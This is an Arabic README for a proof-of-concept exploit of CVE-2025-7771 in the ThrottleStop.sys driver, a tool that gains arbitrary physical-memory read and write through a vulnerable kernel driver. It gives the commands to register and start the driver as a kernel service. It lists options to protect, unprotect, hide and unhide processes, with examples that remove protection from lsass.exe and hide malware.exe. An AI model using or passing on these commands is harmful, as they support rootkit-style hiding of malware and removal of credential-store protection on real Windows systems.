
وصف بسيط لإثبات المفهوم (PoC) يستعرض الثغرة الأمنية في برنامج تشغيل ThrottleStop.sys، ويوضح إمكانيات القراءة والكتابة العشوائية للذاكرة الفعلية، بالإضافة إلى تحويل العناوين الافتراضية إلى فيزيائية باستخدام Superfetch.
PoC بسيط يوضح الثغرة في برنامج تشغيل ThrottleStop.sys، ويعرض قدرات قراءة وكتابة عشوائية للذاكرة الفعلية، بالإضافة إلى ترجمة العناوين من افتراضية إلى فيزيائية باستخدام Superfetch.
قم بتشغيل cmd.exe بصلاحيات المسؤول، وقم بتسجيل خدمة برنامج تشغيل kernel مع نوع "kernel" وbinPath يشير إلى موقع برنامج التشغيل الضعيف.
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop
الأوامر:
--protect : Protect a process.
--unprotect : Unprotect a potected process.
--hide : Hide a process.
--unhide : Unhide a process.
--help : Print help
أمثلة:
CVE-2025-7771.exe --protect notepad.exe أو CVE-2025-7771exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe أو CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe أو CVE-2025-7771.exe --hide 12345
لإظهار عملية مخفية مرة أخرى، يمكنك استخدام الأمر --unhide مع تحديد عنوان eprocess الخاص بالعملية المخفية عبر '--eprocess':
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
أنت مسؤول عن ضمان حصولك على التصريح المناسب قبل استخدام هذه الأداة. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.
هذا مشروع مستمر، المساهمات والاقتراحات مرحب بها! إذا كانت لديك أفكار أو تحسينات أو ترغب في التعاون، فلا تتردد في التواصل عبر: [email protected]